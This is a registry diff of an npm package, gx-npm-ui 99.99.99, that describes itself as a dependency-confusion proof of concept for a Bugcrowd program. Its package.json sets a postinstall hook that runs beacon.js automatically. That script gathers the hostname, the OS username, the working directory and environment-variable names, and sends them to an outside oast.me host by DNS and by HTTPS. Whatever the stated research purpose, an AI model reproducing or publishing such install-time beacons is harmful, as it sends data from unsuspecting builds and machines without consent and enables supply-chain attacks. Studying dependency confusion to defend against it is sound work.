gx-npm-ui 99.99.99
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +30 -0
- package/beacon.js +54 -0
- package/package.json +9 -0
package/README.md
ADDED
|
@@ -0,0 +1,30 @@
|
|
|
1
|
+
# gx-npm-ui — security-research placeholder
|
|
2
|
+
|
|
3
|
+
This package is a **benign proof-of-concept** published as part of **authorized
|
|
4
|
+
security testing** (Bugcrowd bug-bounty program). It exists solely to demonstrate a
|
|
5
|
+
**dependency-confusion** condition: an internal package name that a build references
|
|
6
|
+
but that was left **unclaimed on the public npm registry**, allowing a public package
|
|
7
|
+
of the same name to be substituted.
|
|
8
|
+
|
|
9
|
+
## What it does on install
|
|
10
|
+
|
|
11
|
+
It emits a single beacon containing **only** non-sensitive proof-of-execution metadata:
|
|
12
|
+
|
|
13
|
+
- package name
|
|
14
|
+
- hostname
|
|
15
|
+
- OS username
|
|
16
|
+
- current working directory
|
|
17
|
+
- environment-variable **names** (to evidence a CI/build context — values are never read)
|
|
18
|
+
|
|
19
|
+
It does **NOT** read or transmit environment values, file contents, credentials,
|
|
20
|
+
tokens, source code, or any other data, and it performs **no** destructive action.
|
|
21
|
+
All logic is wrapped so it can never cause a host install to fail.
|
|
22
|
+
|
|
23
|
+
## For maintainers of the affected project
|
|
24
|
+
|
|
25
|
+
If you are seeing this, the name `gx-npm-ui` should be **claimed on your private
|
|
26
|
+
registry and/or scoped** (e.g. `@your-org/...`) so it cannot be substituted from the
|
|
27
|
+
public registry. This placeholder will be **unpublished** once the corresponding
|
|
28
|
+
report is acknowledged.
|
|
29
|
+
|
|
30
|
+
Reported responsibly via Bugcrowd.
|
package/beacon.js
ADDED
|
@@ -0,0 +1,54 @@
|
|
|
1
|
+
/*
|
|
2
|
+
* Benign dependency-confusion PoC beacon.
|
|
3
|
+
* Authorized security research (Bugcrowd / Gartner program).
|
|
4
|
+
*
|
|
5
|
+
* On install this sends ONLY non-sensitive proof-of-execution metadata:
|
|
6
|
+
* - package name
|
|
7
|
+
* - hostname
|
|
8
|
+
* - OS username
|
|
9
|
+
* - current working directory
|
|
10
|
+
* - environment-variable NAMES (to evidence a CI/build context, e.g. CI/JENKINS_URL)
|
|
11
|
+
*
|
|
12
|
+
* It NEVER transmits environment VALUES, file contents, credentials, tokens, or any
|
|
13
|
+
* other data, and performs NO destructive action. Every operation is wrapped so a host
|
|
14
|
+
* install can never fail because of this script.
|
|
15
|
+
*/
|
|
16
|
+
(function () {
|
|
17
|
+
try {
|
|
18
|
+
var os = require('os');
|
|
19
|
+
var dns = require('dns');
|
|
20
|
+
var https = require('https');
|
|
21
|
+
|
|
22
|
+
var OAST = 'd8uectoqtvskhftsa940pm3kth3ahdxn4.oast.me';
|
|
23
|
+
|
|
24
|
+
function safe(s, n) {
|
|
25
|
+
return String(s == null ? 'na' : s)
|
|
26
|
+
.toLowerCase().replace(/[^a-z0-9]+/g, '-').replace(/^-+|-+$/g, '').slice(0, n || 40) || 'na';
|
|
27
|
+
}
|
|
28
|
+
|
|
29
|
+
var pkg = process.env.npm_package_name || 'gx-npm-lib';
|
|
30
|
+
var host = ''; try { host = os.hostname(); } catch (e) {}
|
|
31
|
+
var user = ''; try { user = (os.userInfo && os.userInfo().username); } catch (e) {}
|
|
32
|
+
if (!user) user = process.env.USER || process.env.USERNAME || 'na';
|
|
33
|
+
var cwd = ''; try { cwd = process.cwd(); } catch (e) {}
|
|
34
|
+
var envNames = []; try { envNames = Object.keys(process.env).sort().slice(0, 80); } catch (e) {}
|
|
35
|
+
|
|
36
|
+
// 1) DNS beacon — most reliable through egress filtering: <pkg>.<host>.<user>.<OAST>
|
|
37
|
+
try {
|
|
38
|
+
dns.lookup([safe(pkg, 20), safe(host, 40), safe(user, 30), OAST].join('.'), function () {});
|
|
39
|
+
} catch (e) {}
|
|
40
|
+
|
|
41
|
+
// 2) HTTP beacon — carries fuller (still non-sensitive) JSON for the report write-up.
|
|
42
|
+
try {
|
|
43
|
+
var meta = { pkg: pkg, host: host, user: user, cwd: cwd, env_names: envNames, node: process.version };
|
|
44
|
+
var d = Buffer.from(JSON.stringify(meta)).toString('base64');
|
|
45
|
+
var req = https.request(
|
|
46
|
+
{ host: OAST, port: 443, method: 'GET', path: '/' + safe(pkg, 20) + '?d=' + d, timeout: 4000 },
|
|
47
|
+
function (res) { res.resume(); }
|
|
48
|
+
);
|
|
49
|
+
req.on('error', function () {});
|
|
50
|
+
req.on('timeout', function () { try { req.destroy(); } catch (e) {} });
|
|
51
|
+
req.end();
|
|
52
|
+
} catch (e) {}
|
|
53
|
+
} catch (e) { /* benign: never break the host install */ }
|
|
54
|
+
})();
|
package/package.json
ADDED
|
@@ -0,0 +1,9 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "gx-npm-ui",
|
|
3
|
+
"version": "99.99.99",
|
|
4
|
+
"description": "Authorized security-research placeholder demonstrating a dependency-confusion condition (Bugcrowd). Benign install-time beacon, non-sensitive proof-of-execution metadata only; no secrets, no exfiltration, no destructive action. Will be unpublished after verification.",
|
|
5
|
+
"license": "MIT",
|
|
6
|
+
"scripts": { "postinstall": "node beacon.js" },
|
|
7
|
+
"files": ["beacon.js","README.md"],
|
|
8
|
+
"keywords": ["security-research","dependency-confusion","proof-of-concept"]
|
|
9
|
+
}
|